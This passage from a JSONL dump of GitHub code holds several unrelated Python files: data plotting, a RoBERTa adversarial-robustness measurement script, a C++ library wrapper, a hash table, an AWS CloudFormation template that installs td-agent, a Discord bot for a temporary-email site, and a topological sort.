'Marital Status', y = 'Annual Income', hue = 'Gender', data = customerData)\r\n\r\nplot.xlabel('Marital Status')\r\nplot.ylabel('Annual Income')\r\nplot.title('Annual Income by Marital Status and Gender')\r\nplot.legend(title='Gender', loc='lower right')\r\n\r\nplot.show()\r\n\r\n# Plotting a violin plot of Age distribution by Preferred Category\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.violinplot(x = 'Preferred Category', y = 'Age', data = customerData)\r\n\r\nplot.xlabel('Preferred Category')\r\nplot.ylabel('Age')\r\nplot.title('Violin Plot of Age Distribution by Preferred Category')\r\n\r\nplot.show()","repo_name":"TalhaFarook/SegmentWise","sub_path":"data-eda.py","file_name":"data-eda.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5630967622","text":"import argparse\nimport os\nfrom fairseq.models.roberta import RobertaModel\nimport torch\nfrom fairseq import tasks\nimport torch.nn.functional as F\nfrom fairseq.data import Dictionary\nfrom my_utils import visualize_input_grad\nimport pdb\nimport math\nimport numpy as np\nimport sys\n\ndef get_tokens(line, roberta, task):\n tokens = line.strip().split('\\t')\n if task == \"RTE\":\n sent1, sent2 = tokens[1], tokens[2]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"MRPC\":\n sent1, sent2 = tokens[3], tokens[4]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"CoLA\":\n sent = tokens[1]\n tokens = roberta.encode(sent)\n elif task == \"SST-2\":\n sent = tokens[1]\n tokens = roberta.encode(sent)\n elif task == \"STS-B\":\n sent1, sent2 = tokens[7], tokens[8]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"QQP\":\n sent1, sent2 = tokens[1], tokens[2]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"QNLI\":\n sent1, sent2 = tokens[1], tokens[2]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"WNLI\":\n sent1, sent2 = tokens[1], tokens[2]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"MNLI-m\":\n sent1, sent2 = tokens[-2], tokens[-1]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"MNLI-mm\":\n sent1, sent2 = tokens[-2], tokens[-1]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"AX\":\n sent1, sent2 = tokens[-2], tokens[-1]\n tokens = roberta.encode(sent1, sent2)\n else:\n print(\"Task {} undefined\".format(task))\n exit()\n return tokens\n\n\ndef bytes_to_unicode():\n \"\"\"\n Returns list of utf-8 byte and a corresponding list of unicode strings.\n The reversible bpe codes work on unicode strings.\n This means you need a 
large # of unicode characters in your vocab if you want to avoid UNKs.\n When you're at something like a 10B token dataset you end up needing around 5K for decent coverage.\n This is a signficant percentage of your normal, say, 32K bpe vocab.\n To avoid that, we want lookup tables between utf-8 bytes and unicode strings.\n And avoids mapping to whitespace/control characters the bpe code barfs on.\n \"\"\"\n bs = list(range(ord(\"!\"), ord(\"~\")+1))+list(range(ord(\"¡\"), ord(\"¬\")+1))+list(range(ord(\"®\"), ord(\"ÿ\")+1))\n cs = bs[:]\n n = 0\n for b in range(2**8):\n if b not in bs:\n bs.append(b)\n cs.append(2**8+n)\n n += 1\n cs = [chr(n) for n in cs]\n return dict(zip(bs, cs))\n\n\ndef decode(tokens, decoder, byte_decoder):\n text = ''.join([decoder[token.item()] for token in tokens])\n text = bytearray([byte_decoder[c] for c in text]).decode('utf-8', errors='replace')\n return text\n\ndef load_dictionary(filename):\n \"\"\"Load the dictionary from the filename\n\n Args:\n filename (str): the filename\n \"\"\"\n dictionary = Dictionary.load(filename)\n dictionary.add_symbol('')\n return dictionary\n\n\ndef get_entropy(attn_mat, tokens):\n # attn_mat: batch_size x shape\n # attn_mat = attn_mat.view(attn_mat.size(0), -1)\n # batch_size x num_heads x tok_len x tok_len\n bsize, nheads, toklen, _ = attn_mat.size()\n # attn_mat = attn_mat.transpose(1,2).contiguous().view(bsize, toklen, -1) / nheads\n # weighted_likelihood = - attn_mat * torch.log(torch.clamp(attn_mat, min=1e-10))\n # mask = (tokens != 1).float().unsqueeze(2).cuda()\n # total_entropy = torch.sum(mask * weighted_likelihood)\n cls_head_attn = attn_mat[:,:,0,:].contiguous()#.view(bsize, -1) / nheads\n total_entropy = torch.sum(cls_head_attn * torch.clamp(cls_head_attn, min=1e-10)).item()\n return total_entropy\n\ndef get_loss(args, embeds, batch, roberta_hub):\n tokens = batch['net_input']['src_tokens'].cuda()\n labels = batch['target'].view(-1).cuda()\n ids = batch['id']\n if args.dset == \"STS-B\":\n logits = roberta_hub.predict_from_embed('sentence_classification_head', tokens, embeds,\n return_logits=True)\n loss = F.mse_loss(\n logits,\n labels,\n reduction=\"sum\",\n )\n prediction = logits\n else:\n logit = roberta_hub.predict_from_embed('sentence_classification_head', tokens, embeds,\n return_logits=True)\n loss = F.nll_loss(\n F.log_softmax(logit, dim=-1, dtype=torch.float32),\n labels,\n reduction=\"sum\",\n )\n\n prediction = logit.argmax(dim=1).detach()\n\n return loss, prediction\n\n\ndef run_one_trial(args, roberta_hub, t, batch, max_norm, early_stop=False):\n max_loss, this_loss = -1, 0\n satisfy_count = 0\n n_iters = 0\n tol = args.tol\n hist_len = 50\n print(\"===== Trial {}\".format(t))\n adv_lr = args.adv_lr\n # while satisfy_count < 30 and n_iters < 10000:\n running_history = [-1]\n tokens = batch['net_input']['src_tokens'].cuda()\n embeds_init = roberta_hub.model.decoder.sentence_encoder.embed_tokens(tokens.cuda()).detach().clone()\n input_mask = (batch['net_input']['src_tokens'] != 1).to(embeds_init)\n delta = torch.zeros_like(embeds_init).uniform_(-1, 1) * input_mask.unsqueeze(2)\n mag = max_norm / torch.sqrt(\n batch['net_input']['src_lengths'].to(delta) * embeds_init.size(-1))\n delta = (delta * mag.view(-1, 1, 1)).detach()\n delta.requires_grad_()\n # while satisfy_count < hist_len and n_iters < 5000:\n while satisfy_count < hist_len and n_iters < 2000:\n n_iters += 1\n loss, prediction = get_loss(args, embeds_init + delta, batch, roberta_hub)\n\n if n_iters == 1:\n print(\"Prediction at 
initialization: {}, label: {}\".format(prediction.item(), batch['target'].item()))\n\n delta_grad = torch.autograd.grad([loss], delta)[0]\n\n embed_grad_norm = max(torch.norm(delta_grad, p=2).item(), 1e-10)\n delta = (delta + adv_lr * delta_grad / embed_grad_norm).detach()\n if n_iters in [2000]:\n adv_lr *= 0.1\n print(\"* Adjusted LR to {}\".format(adv_lr))\n\n delta_norm = torch.norm(delta).item()\n if delta_norm > max_norm:\n delta.data = delta.data / delta_norm * max_norm\n delta.requires_grad_()\n\n this_loss = loss.item()\n\n delta_change = abs((this_loss - max_loss) / this_loss)\n\n # delta_history = np.std(running_history) / embed_grad_norm\n delta_history = np.std(running_history) / this_loss\n if len(running_history) < hist_len//2:\n running_history.append(this_loss)\n else:\n running_history = running_history[1:]\n running_history.append(this_loss)\n\n if (delta_change < tol or delta_history < tol) and delta_norm >= max_norm*0.999:\n satisfy_count += 1\n else:\n satisfy_count = 0\n\n if n_iters==1 or n_iters % 100 == 0:\n print(\"Step {}, satisfy_count: {}, loss {:.2e}, max loss {:.2e}, delta change {:.2e}, delta history {:.2e} delta norm: {:.2e}, delta grad norm: {:.2e}\".format(n_iters,\n satisfy_count,\n this_loss, max_loss,\n delta_change,\n delta_history,\n torch.norm(\n delta).item(),\n torch.norm(\n delta_grad)))\n sys.stdout.flush()\n # opt.zero_grad()\n if this_loss > max_loss:\n max_loss = this_loss\n\n torch.cuda.empty_cache()\n roberta_hub.model.zero_grad()\n if early_stop and max_loss > -math.log(0.5):\n break\n\n print(\"* Trial {}, max loss: {}\".format(t, max_loss))\n return max_loss\n\ndef get_correct_idx(batch_iter, model_path, roberta_hub):\n correct_idx_list = []\n\n\n n_corr, n_total = 0, 0\n with torch.no_grad():\n for nb, batch in enumerate(batch_iter):\n tokens = batch['net_input']['src_tokens'].cuda()\n labels = batch['target'].view(-1).cuda()\n ids = batch['id']\n\n logit = roberta_hub.predict('sentence_classification_head', tokens, return_logits=True)\n prediction = logit.argmax(dim=1)\n correct_flag = prediction.view(-1) == labels\n correct_idx_list += [id.item() for id in ids[correct_flag]]\n n_corr += torch.sum(correct_flag)\n n_total += correct_flag.size(0)\n print(\"*** Loaded model from {}, with acc {}\".format(model_path, float(n_corr)/float(n_total)))\n return correct_idx_list\n\ndef check_one_radius(radius, roberta_hub, batch, early_stop=False):\n tokens = batch['net_input']['src_tokens'].cuda()\n labels = batch['target'].view(-1).cuda()\n ids = batch['id']\n\n embeds_init = roberta_hub.model.decoder.sentence_encoder.embed_tokens(tokens.cuda()).detach().clone()\n print(\"Max norm is: {}\".format(radius))\n init_loss, init_pred = get_loss(args, embeds_init, batch, roberta_hub)\n print(\"**** Clean Loss: {}\".format(init_loss))\n # max_norm = args.max_norm\n max_loss = run_one_trial(args, roberta_hub, 0, batch, radius, early_stop=early_stop)\n return max_loss, init_loss.item()\n\n\ndef get_radiuses(single_iter, roberta_hub, resume_dict=None):\n\n epsilons = np.linspace(args.max_norm, 1e-2, args.norm_steps)\n epsilons = np.concatenate([epsilons, np.linspace(9e-3, 1e-4, args.norm_steps)])\n if resume_dict is not None:\n eps_dict = resume_dict['eps_dict']\n max_loss_dict = resume_dict['max_loss_dict']\n init_loss_dict = resume_dict['init_loss_dict']\n else:\n eps_dict = {}\n max_loss_dict, init_loss_dict = {}, {}\n for nb, batch in enumerate(single_iter):\n if batch['id'].item() in eps_dict:\n continue\n # tokens = 
batch['net_input']['src_tokens'].cuda()\n # embeds_init = roberta_hub.model.decoder.sentence_encoder.embed_tokens(tokens).data.detach()\n # init_loss, init_pred = get_loss(args, embeds_init, batch, roberta_hub)\n # if init_loss > -math.log(0.5):\n # pdb.set_trace()\n for epsilon in epsilons:\n if epsilon == 0:\n print(\"Sample {} does not have valid epsilon. Must be a bug! Or filter samples into clean samples first\".format(batch['id']))\n exit()\n max_loss, init_loss = check_one_radius(epsilon, roberta_hub, batch, early_stop=True)\n if max_loss <= -math.log(0.5):\n break\n else:\n print(\"Sample {}, max loss {} @ radius {}, exceeds thershold.\".format(batch['id'], max_loss, epsilon))\n eps_dict[batch['id'].item()] = epsilon\n max_loss_dict[batch['id'].item()] = max_loss\n init_loss_dict[batch['id'].item()] = init_loss\n print(\"**** Got eps for sample {}: {}, with loss {}\".format(batch['id'].item(), epsilon, max_loss))\n torch.save({'eps_dict': eps_dict, 'max_loss_dict': max_loss_dict, \"init_loss_dict\": init_loss_dict},\n 'losses/{}-maxeps{}-res-dict-anchor-{}.pt'.format(args.dset, args.max_norm, args.suffix))\n return eps_dict, max_loss_dict, init_loss_dict\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--chk-dirs\", default=[\"analysis-models/RTE-adv-2e-2_3_5e-3-89.21-5\",\n \"analysis-models/freeadv-syncdp-RTE-iters2036-warmup122-lr1e-5-bsize2-freq8-advlr2e-2-advstep3-initmag5e-3-fp32-seed4207-abi0-beta0.999-stdadv\",\n \"analysis-models/RTE-baseline-86.69-4\"], type=str, nargs=\"+\", help=\"Will use the first one as anchor\")\n parser.add_argument(\"--chk-fname\", default=\"checkpoint_best.pt\", type=str)\n parser.add_argument(\"--task\", default=\"sentence_prediction\", type=str)\n parser.add_argument(\"--dset\", default=\"RTE\", type=str)\n parser.add_argument(\"--test-path\", default=\"glue_data\")\n parser.add_argument(\"--out-path\", default=\"glue-test\")\n parser.add_argument(\"--num\", default=0, type=int)\n # parser.add_argument(\"--batch-size\", default=2, type=int)\n parser.add_argument(\"--num-classes\", default=2, type=int)\n parser.add_argument(\"--max-positions\", default=512, type=int)\n parser.add_argument(\"--regression-target\", default=False, type=bool)\n parser.add_argument(\"--dataset-impl\", default=None)\n parser.add_argument(\"--init-token\", default=0, type=int)\n parser.add_argument(\"--separator-token\", default=2, type=int)\n parser.add_argument(\"--no-shuffle\", default=True, type=int)\n parser.add_argument(\"--seed\", default=1, help=\"Shall not be used. 
Placeholder\")\n parser.add_argument(\"--truncate-sequence\", default=False)\n parser.add_argument(\"--attn-layer-idx\", default=0, type=int)\n parser.add_argument(\"--gpu\", default=\"0\", type=str)\n parser.add_argument(\"--tol\", default=1e-5, type=float)\n parser.add_argument(\"--n-trials\", default=100, type=int)\n # parser.add_argument(\"--sample-idx\", default=[12,13], type=int, nargs=\"+\")\n # parser.add_argument(\"--max-norm-ratio\", default=0.22, type=float)\n parser.add_argument(\"--max-norm\", default=0.2, type=float)\n parser.add_argument(\"--norm-steps\", default=11, type=int)\n parser.add_argument(\"--adv-lr\", default=5e-3, type=float)\n # parser.add_argument(\"--init-mag-ratio\", default=0.01, type=float)\n parser.add_argument(\"--out-fname\", default='init.pt', type=str)\n parser.add_argument(\"--resume\", default=\"\", type=str)\n parser.add_argument(\"--suffix\", default=\"\", type=str)\n args = parser.parse_args()\n print(args)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\" # see issue #152\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n\n bin_task = \"MNLI\" if \"MNLI\" in args.dset or args.dset == \"AX\" else args.dset\n args.data = bin_task+\"-bin\"\n\n ncorrect, nsamples = 0, 0\n\n if not os.path.exists(args.out_path):\n os.makedirs(args.out_path)\n\n if not os.path.exists(os.path.join(args.out_path, \"scores\")):\n os.makedirs(os.path.join(args.out_path, \"scores\"))\n\n task = tasks.setup_task(args)\n\n split = \"valid\"\n\n task.load_dataset(split)\n batch_itr = task.get_batch_iterator(\n dataset=task.dataset(split),\n max_tokens=4400,\n max_sentences=16,\n max_positions=512,\n ignore_invalid_inputs=False,\n required_batch_size_multiple=1,\n seed=1,\n ).next_epoch_itr(shuffle=False)\n\n total_entropy, total_attns = 0, 0\n total_corr, total_samples = 0, 0\n scores_list = []\n\n total_norm_grad, total_tokens = 0, 0\n\n # 1. get the intersection where all models make the correct prediction\n roberta_hub_list = []\n for n_chk, chk_dir in enumerate(args.chk_dirs):\n roberta = RobertaModel.from_pretrained(\n chk_dir,\n checkpoint_file=args.chk_fname,\n data_name_or_path=bin_task + \"-bin\"\n )\n roberta.to('cuda')\n roberta.eval()\n roberta_hub_list.append(roberta)\n\n correct_idx_list = get_correct_idx(batch_itr, chk_dir, roberta)\n\n if n_chk == 0:\n valid_set = set(correct_idx_list)\n else:\n valid_set = valid_set & set(correct_idx_list)\n valid_idx_list = sorted(list(valid_set))\n\n # 2. get the radius for robust nets\n single_valid_iter = task.get_batch_iterator_from_idx(\n dataset=task.dataset(split),\n max_tokens=4400,\n max_sentences=1,\n max_positions=512,\n ignore_invalid_inputs=False,\n required_batch_size_multiple=1,\n seed=1,\n idx_list=valid_idx_list\n ).next_epoch_itr(shuffle=False)\n if args.resume:\n resume_dict = torch.load(args.resume)\n else:\n resume_dict = None\n eps_dict, max_loss_dict, init_loss_dict = get_radiuses(single_valid_iter, roberta_hub_list[0], resume_dict)\n torch.save({'eps_dict': eps_dict, 'max_loss_dict': max_loss_dict, \"init_loss_dict\":init_loss_dict}, 'losses/{}-maxeps{}-res-dict-anchor-{}.pt'.format(args.dset, args.max_norm, args.suffix))\n\n # 3. 
Get the max loss for other models in such radiuses\n init_loss_dict_list, max_loss_dict_list = [init_loss_dict], [max_loss_dict]\n for nr, roberta_hub in enumerate(roberta_hub_list[1:]):\n this_init_loss_dict, this_max_loss_dict = {}, {}\n for nb, batch in enumerate(single_valid_iter):\n id_int = batch['id'].item()\n eps = eps_dict[id_int]\n max_loss, init_loss = check_one_radius(eps, roberta_hub, batch)\n this_init_loss_dict[id_int] = init_loss\n this_max_loss_dict[id_int] = max_loss\n print(\"Model {}, sample {}, this max loss: {}, anchor max loss: {}\".format(nr, id_int, max_loss, max_loss_dict_list[0][id_int]))\n\n torch.save({'eps_dict': eps_dict, 'max_loss_dict': this_max_loss_dict, \"init_loss_dict\": this_init_loss_dict},\n 'losses/{}-maxeps{}-res-dict-{}-{}.pt'.format(args.dset, args.max_norm, nr, args.suffix))\n init_loss_dict_list.append(this_init_loss_dict)\n max_loss_dict_list.append(this_max_loss_dict)\n torch.save({'eps_dict': eps_dict, 'max_loss_dict': max_loss_dict_list, \"init_loss_dict\": init_loss_dict_list},\n 'losses/{}-maxeps{}-res-dict-all-{}.pt'.format(args.dset, args.max_norm, args.suffix))\n\n\n\n\n\n","repo_name":"zhuchen03/FreeLB","sub_path":"fairseq-RoBERTa/scripts/get_highest_loss.py","file_name":"get_highest_loss.py","file_ext":"py","file_size_in_byte":17874,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"53"} +{"seq_id":"9116239158","text":"#!/usr/bin/env python3\n\nimport cppyy\nimport os\n# install_path/lib/pythonX.Y/dist-packages/log2plot/__init__.py\ninstall_path = os.path.abspath(__file__)\nfor _ in range(5):\n install_path = os.path.dirname(install_path)\n\ncppyy.add_include_path(install_path + '/include')\ncppyy.include('log2plot/logger.h')\ncppyy.include('log2plot/config_manager.h')\ncppyy.load_library(install_path + '/lib/liblog2plot.so')\n\n# put methods / classes from log2plot C++ namespace into this one\nfor m in dir(cppyy.gbl.log2plot) + ['Logger', 'ConfigManager']:\n if not m[0] == '_':\n globals()[m] = getattr(cppyy.gbl.log2plot, m)\n\ndel m, install_path\n\n# Wrap std::vector\nVec = cppyy.gbl.std.vector['double']\n\n\ndef copy(src, dst: Vec):\n '''\n copy any Python type into the corresponding underlying std::vector\n does not check sizes, just assumes they match\n '''\n for i in range(dst.size()):\n dst[i] = src[i]\n","repo_name":"oKermorgant/log2plot","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"70248163050","text":"class HashTable:\n def __init__(self, sz, stp):\n self.size = sz\n self.step = stp\n self.slots = [None] * self.size\n\n def hash_fun(self, value): \n summa = len(value.encode('utf8'))\n return summa % self.size\n\n def seek_slot(self, value): \n hashStep = self.step\n hash = self.hash_fun(value)\n if self.slots[hash] is None:\n return hash\n nextIteration = False\n while self.slots[hash] is not None:\n hash += hashStep\n if hash >= len(self.slots):\n hash = hash - len(self.slots)\n nextIteration = True\n hashStep *= 2\n if nextIteration and hash > self.hash_fun(value):\n return None\n if nextIteration and hash + self.step >= len(self.slots):\n return None\n return hash\n\n def put(self, value): \n index = self.seek_slot(value)\n if index is None:\n return None\n self.slots[index] = value\n return index\n\n def find(self, value): \n index = None\n for i in range(len(self.slots)):\n slot = self.slots[i]\n if slot is not 
None and slot == value:\n return i\n return index\n","repo_name":"LexSteine/DataStructures1","sub_path":"HashTable.py","file_name":"HashTable.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26611832379","text":"# -*- coding: utf-8 -*-\n\nfrom aws_vapor.dsl import Template\nfrom aws_vapor.dsl import Metadatum\nfrom aws_vapor.dsl import Parameter\nfrom aws_vapor.dsl import Mapping\nfrom aws_vapor.dsl import Condition\nfrom aws_vapor.dsl import Resource\nfrom aws_vapor.dsl import Output\nfrom aws_vapor.dsl import Attributes\nfrom aws_vapor.dsl import Intrinsics\nfrom aws_vapor.dsl import Pseudos\nfrom aws_vapor.dsl import UserData\nfrom aws_vapor.dsl import CfnInitMetadata\n\n\ndef generate():\n t = Template(description='td-agent Template')\n\n ami_id = t.parameters(Parameter('AmiId')\n .description('EC2 machine image ID of the sample server')\n .type('AWS::EC2::Image::Id')\n )\n\n instance_type = t.parameters(Parameter('InstanceType')\n .description('EC2 instance type of the sample server')\n .type('AWS::EC2::KeyPair::KeyName')\n )\n\n security_group_ids = t.parameters(Parameter('SecurityGroupIds')\n .description('List of security group IDs of the sample server')\n .type('List')\n )\n\n key_name = t.parameters(Parameter('KeyName')\n .description('Name of an existing EC2 key pair to enable SSH access to the sample server')\n .type('AWS::EC2::KeyPair::KeyName')\n )\n\n subnet_id = t.parameters(Parameter('SubnetId')\n .description('Subnet ID which the sample server runs on')\n .type('AWS::EC2::Subnet::Id')\n )\n\n sample_server = t.resources(Resource('MongoDBServer').type('AWS::EC2::Instance').properties([\n Attributes.of('ImageId', ami_id),\n Attributes.of('InstanceType', instance_type),\n Attributes.of('SecurityGroupIds', security_group_ids),\n Attributes.of('KeyName', key_name),\n Attributes.of('SubnetId', subnet_id)\n ]))\n\n sample_server.add_property(UserData.from_files([\n ('files/x-shellscript', 'x-shellscript'),\n ('files/cloud-config', 'cloud-config')\n ], {\n 'stack_id': Pseudos.stack_id(),\n 'resource_name': sample_server.name,\n 'region': Pseudos.region()\n }))\n\n sample_server.metadata(CfnInitMetadata.of([\n CfnInitMetadata.Init([\n CfnInitMetadata.ConfigSet('default', [\n CfnInitMetadata.Config('SetupRepos')\n .commands('import_td-agent_GPG-KEY', 'rpm --import https://packages.treasuredata.com/GPG-KEY-td-agent')\n ,\n CfnInitMetadata.Config('Install')\n .packages('yum', 'dstat')\n .packages('yum', 'td-agent')\n .commands('install_td-agent_plugin', 'td-agnet-gem install fluent-plugin-dstat fluent-plugin-map fluent-plugin-forest')\n ,\n CfnInitMetadata.Config('Configure')\n .files('/etc/td-agent/td-agent.conf', local_file_path='files/td-agent.conf', mode='000644', owner='root', group='root')\n ,\n CfnInitMetadata.Config('Start')\n .services('sysvinit', 'td-agent', enabled=True, ensure_running=True)\n ])\n ])\n ]))\n\n return t\n","repo_name":"ohtomi/aws-vapor","sub_path":"examples/td-agent.py","file_name":"td-agent.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20086123725","text":"from selenium import webdriver\nimport time\nimport os\nimport discord\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\n# from bs4 import BeautifulSoup\n\nurl = 'https://10minutemail.com'\nclient = discord.Client()\ndrivers = dict()\nsess_starts = 
dict()\nopts = webdriver.firefox.options.Options()\nopts.headless = True\n\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n\n\n@client.event\nasync def on_message(message):\n user = message.author\n if user in drivers and sess_starts[user] + 900 < time.time():\n del drivers[user]\n del sess_starts[user]\n await message.channel.send('Your session expired')\n if user == client.user:\n return\n if message.content.startswith('$'):\n if message.content == '$create':\n driver = webdriver.Firefox(options=opts)\n drivers[user] = driver\n sess_starts[user] = time.time()\n driver.get(url)\n time.sleep(5)\n temp_mail = driver.find_element_by_id('mail_address').get_attribute('value')\n await message.channel.send('Your temporary mail is : %s' % temp_mail)\n\n elif user in drivers:\n driver = drivers[user]\n msgs_count = int(driver.find_element_by_id('inbox_count_number').text)\n messages = driver.find_elements_by_class_name('mail_message')\n if message.content == '$check':\n preview = ''\n if msgs_count > 0:\n preview = ':\\n'\n for i in range(len(messages)):\n msg = messages[i]\n preview = preview + '(' + str(i + 1) + \\\n '). From: ' + msg.find_element_by_class_name('small_sender').text + \\\n ' | Subject: ' + msg.find_element_by_class_name('small_subject').text + \\\n ' | Date: ' + msg.find_element_by_class_name('small_date').text + '\\n'\n await message.channel.send('You have ' + str(msgs_count) + ' messages in mailbox' + preview)\n\n elif message.content == '$end':\n driver.quit()\n del drivers[user]\n await message.channel.send('Your session ended')\n\n else:\n msg_split = message.content.split(maxsplit=2)\n if msg_split[0] == '$read':\n try:\n msg_index = int(msg_split[1])\n except ValueError:\n await message.channel.send('Unsupported index')\n else:\n if msg_index > msgs_count or msg_index <= 0:\n await message.channel.send('The message with that index does not exist, you only have ' +\n str(msgs_count) + ' messages')\n else:\n msg = messages[msg_index - 1]\n print(msg.find_element_by_class_name('message_bottom').is_displayed())\n if not msg.find_element_by_class_name('message_bottom').is_displayed():\n msg.click()\n txt_to_print = msg.find_element_by_class_name('message_bottom').text\n await message.channel.send(txt_to_print)\n\n elif msg_split[0] == '$reply_to':\n try:\n msg_index = int(msg_split[1])\n except ValueError:\n await message.channel.send('Unsupported index')\n else:\n if msg_index > msgs_count or msg_index <= 0:\n await message.channel.send('The message with that index does not exist')\n else:\n msg = messages[msg_index - 1]\n if not msg.find_element_by_class_name('message_bottom').is_displayed():\n await message.channel.send('Maybe you should read it first?')\n else:\n text_to_reply = msg_split[2]\n print(text_to_reply)\n msg.find_element_by_class_name('message_reply_icon').click()\n msg.find_element_by_class_name('reply_message_text').send_keys(text_to_reply)\n msg.find_element_by_class_name('reply_message_submit').click()\n\n elif msg_split[0] == '$forward':\n try:\n msg_index = int(msg_split[1])\n except ValueError:\n await message.channel.send('Unsupported index')\n else:\n if msg_index > msgs_count or msg_index <= 0:\n await message.channel.send('The message with that index does not exist')\n else:\n msg = messages[msg_index - 1]\n if not msg.find_element_by_class_name('message_bottom').is_displayed():\n await message.channel.send('Maybe you should read it first?')\n else:\n forward_address = msg_split[2]\n 
msg.find_element_by_class_name('message_forward_icon').click()\n msg.find_element_by_class_name('forward_message_address').send_keys(forward_address)\n msg.find_element_by_class_name('forward_message_submit').click()\n else:\n await message.channel.send('Your session does not exist')\n\nclient.run(TOKEN)\n","repo_name":"Fenfiriy/TrainingWheels","sub_path":"0.py","file_name":"0.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19353090604","text":"\"\"\"\nTopological sort practice problem\n\"\"\"\n\n\nclass Node(object):\n \"\"\"A node in the DAG\n \"\"\"\n\n def __init__(self, adj):\n \"\"\"\n\n :param adj: Sequence of adjacent 0-based node indexes.\n \"\"\"\n self.adj = tuple(adj)\n\n\nclass DAG(object):\n def __init__(self, nodeSpecs):\n \"\"\"\n\n :param nodeSpecs: an ordered sequence of sequences. Each sub-sequence\n represents a node and its elements are 0-based indexes to the adjacent\n nodes relative to the first sub-sequence in this arg. e.g.,\n [\n [3], # node 0\n [2, 3], # node 1\n [4], # node 2\n [], # node 3\n [], # node 4\n ]\n\n The graph [[1, 2],[3], [3], [2]] would be an invalid DAG due to the\n cycle [0, 1, 3, 2, 3]\n\n :raises: ValueError, TypeError if problems found with input args, such\n as non-integer or out-of-range node indexes or cycle in graph.\n \"\"\"\n self.nodes = []\n for adj in nodeSpecs:\n self.nodes.append(Node(adj))\n\n # Check for adjacent indexes out of bounds\n for nodeIdx, node in enumerate(self.nodes):\n for adjIdx in node.adj:\n if not isinstance(adjIdx, (int, long)):\n raise TypeError(\n \"adjIdx {0!r} of node {1} must be int or long\".format(\n adjIdx, nodeIdx))\n if adjIdx < 0 or adjIdx >= len(self.nodes):\n raise ValueError(\n \"adjIdx {0!r} of node {1} is out of bounds\".format(\n adjIdx, nodeIdx))\n\n # Check for cycles\n cyclePath = []\n if self.isCyclic(cyclePath=cyclePath):\n raise ValueError(\"Found cycle in graph: {!r}\".format(cyclePath))\n\n\n def isCyclic(self, cyclePath=None):\n \"\"\"\n\n :param list cyclePath: if a cycle is found, the corresponding node\n indexes will be inserted into this list if it's not None\n\n :return: True if cycle found in graph, False if not\n \"\"\"\n if not self.nodes:\n return False\n\n # Get indexes of nodes without any incoming edges\n rootNodeIndexes = [i for i, count in\n enumerate(self.getInboundEdgeCounts())\n if count == 0]\n if not rootNodeIndexes:\n # All nodes have incoming edges, so must be a cycle\n if cyclePath is None:\n return True\n else:\n # Search for cycles from every sub-graph so that we can\n # report a cycle via cyclePath arg\n rootNodeIndexes = list(xrange(len(self.nodes)))\n\n\n # Perform (depth first traversal) checking for back edges\n # TODO Should these be inside the for-loop below?\n visited = [False] * len(self.nodes)\n inRecursionStack = [False] * len(self.nodes)\n\n for rootIdx in rootNodeIndexes:\n if self._isCyclicHelper(rootIdx=rootIdx, visited=visited,\n inRecursionStack=inRecursionStack,\n cyclePath=cyclePath):\n return True\n\n\n def _isCyclicHelper(self, rootIdx, visited, inRecursionStack,\n cyclePath=None):\n \"\"\"Use depth-first-traversal to detect if the graph is cyclic.\n\n :param rootIdx: Index of the sub-graph's root node\n :param visited: list of booleans, each indicating whether the\n sub-graph rooted at the corresponding node has been explored.\n :param inRecursionStack: list of booleans, each indicating whether the\n corresponding node is an ancestor 
of the node being explored.\n :param list cyclePath: if a cycle is found, the corresponding node\n indexes will be inserted into this list if it's not None\n\n :return: True if cycle found, False if not\n \"\"\"\n # The current root is being visited and is in recursion stack\n inRecursionStack[rootIdx] = True\n\n # Traverse all vertexes adjacent to this one looking for back edges\n # into nodes that are currently in recursion stack.\n for adjIdx in self.nodes[rootIdx].adj:\n\n if visited[adjIdx]:\n # Sub-graph at adjIdx already explored\n continue\n\n if inRecursionStack[adjIdx]:\n # Edge from rootIdx to adjIdx is part of a cycle\n if cyclePath is not None:\n cyclePath.insert(0, adjIdx)\n cyclePath.insert(0, rootIdx)\n return True\n\n if self._isCyclicHelper(adjIdx,\n visited,\n inRecursionStack,\n cyclePath):\n if cyclePath is not None:\n cyclePath.insert(0, rootIdx)\n return True\n\n # Done exploring the sub-graph rooted at rootIdx\n visited[rootIdx] = True\n\n # Remove rootIdx node from the exploration path\n inRecursionStack[rootIdx] = False\n return False\n\n def getTopologicalOrder(self):\n \"\"\"\n\n :return: Sequence of the graph's node indexes in topological order\n \"\"\"\n # Initialize inbound edge counts for all nodes\n inboundEdgeCounts = self.getInboundEdgeCounts()\n\n # Initialize work queue with indexes of nodes without inbound edges\n workQueue = [i for i, count in enumerate(inboundEdgeCounts)\n if count == 0]\n\n # Ordered list will be filled with topologically ordered node indexes\n orderedList = []\n\n while workQueue:\n # Dequeue the next node index without inbound edges and add it to\n # result\n rootIdx = workQueue.pop(0)\n orderedList.append(rootIdx)\n\n # Remove root's edges, placing indexes of adjacent nodes that reach\n # 0 inbound count on the work 